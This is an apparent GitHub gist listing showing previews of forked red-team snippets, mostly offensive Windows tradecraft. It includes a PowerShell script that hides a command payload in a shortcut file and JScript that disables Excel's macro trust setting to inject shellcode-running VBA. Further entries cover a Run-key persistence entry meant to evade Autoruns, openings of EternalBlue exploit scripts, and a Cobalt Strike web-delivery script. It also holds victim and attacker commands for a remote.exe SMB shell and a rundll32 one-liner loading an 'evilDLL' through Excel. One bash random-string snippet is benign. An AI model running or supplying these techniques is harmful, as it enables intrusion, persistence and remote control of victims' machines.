jbarcia
jbarcia
/ shortcut.ps1
Created
January 2, 2017 03:19
— forked from 3gstudent/shortcut.ps1
Hide payload into Windows shortcut
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $file = Get-Content "c:\test\test.txt" | |
| $WshShell = New-Object -comObject WScript.Shell | |
| $Shortcut = $WshShell.CreateShortcut("c:\test\test.lnk") | |
| $Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe" | |
| $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" | |
| $Shortcut.Arguments = ' '+ $file | |
| $Shortcut.Save() |
jbarcia
/ bash.generate.random.alphanumeric.string.sh
Created
February 16, 2017 00:46
— forked from earthgecko/bash.generate.random.alphanumeric.string.sh
shell/bash generate random alphanumeric string
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # bash generate random alphanumeric string | |
| # | |
| # bash generate random 32 character alphanumeric string (upper and lowercase) and | |
| NEW_UUID=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1) | |
| # bash generate random 32 character alphanumeric string (lowercase only) | |
| cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var objExcel = new ActiveXObject("Excel.Application"); | |
| objExcel.Visible = false; | |
| var WshShell = new ActiveXObject("WScript.Shell"); | |
| var Application_Version = objExcel.Version;//Auto-Detect Version | |
| var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
| WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
| var objWorkbook = objExcel.Workbooks.Add(); | |
| var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); | |
| // Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ | |
| var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n'; |
jbarcia
/ test.reg
Created
April 7, 2017 02:28
— forked from hasherezade/test.reg
Demo: persistence key not visible for sysinternals autoruns
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] | |
| @="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\"" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.EnterpriseServices; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
| Create Your Strong Name Key -> key.snk |
jbarcia
/ eternalblue7_exploit.py
Created
May 18, 2017 23:49
— forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 7/2008 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
jbarcia
/ eternalblue8_exploit.py
Created
May 18, 2017 23:49
— forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
jbarcia
/ stagelessweb.cna
Created
June 27, 2017 02:58
— forked from rsmudge/stagelessweb.cna
A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Scripted Web Delivery (Stageless) | |
| # | |
| # This script demonstrates some of the new APIs in Cobalt Strike 3.7. | |
| # setup our stageless PowerShell Web Delivery attack | |
| sub setup_attack { | |
| local('%options $script $url $arch'); | |
| %options = $3; | |
| # get the arch right. |
jbarcia
/ gist:d6ec49b7a1452867562d24e0f0b15e62
Created
July 11, 2017 23:07
— forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301
remote.exe - a useful, MS signed SMB shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Command to run on the victim | |
| # This will establish a PowerShell listener over the "pwnme" named pipe | |
| remote /S "powershell.exe" pwnme | |
| # Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
| runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
| remote /C [Hostname\IP] "pwnme" |
jbarcia
/ excel.bat
Created
July 12, 2017 12:34
— forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM rundll32 mshtml.dll HTA one-liner command: | |
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); |